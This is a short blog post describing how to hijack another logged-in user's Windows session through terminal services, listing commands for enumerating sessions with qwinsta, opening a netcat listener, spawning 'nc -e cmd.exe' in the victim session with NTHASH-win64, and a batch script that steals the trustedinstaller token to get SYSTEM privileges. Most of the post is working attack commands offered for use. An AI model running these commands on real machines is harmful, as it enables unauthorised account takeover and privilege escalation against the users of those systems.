Oct 302019
 

In previous article we have (ab)used windows tokens to steal someone else account.

Lets see a different way to perform this task (ab)using terminal services.

1.Retrieve the session id of your victim with qwinsta

2.Open a shell (within the attacker session) to which your victim will connect to : nc -L -vv -p 9000

3.Spawn a process within your victim session which will connect back to your shell : NTHASH-win64.exe /runts /user:session_id /binary:nc 127.0.0.1 9000 -e cmd.exe

And again, enjoy the output of your whoami.

Note that you need special privileges (SeTcbPrivilege) to perform step 3 – my preference goes to using a « trustedinstaller » session (but many other context will do like winlogon, etc).

If need be, the below batch will create a new shell with proper privileges to perform step 3 above.

@echo off
net start trustedinstaller
for /F "tokens=1" %%K in (' nthash-win64 /enumproc ^| findstr /i "trustedinstaller" ') do ( nthash-win64 /runastoken /pid:%%K /system )

 Leave a Reply

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

(required)

(required)

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.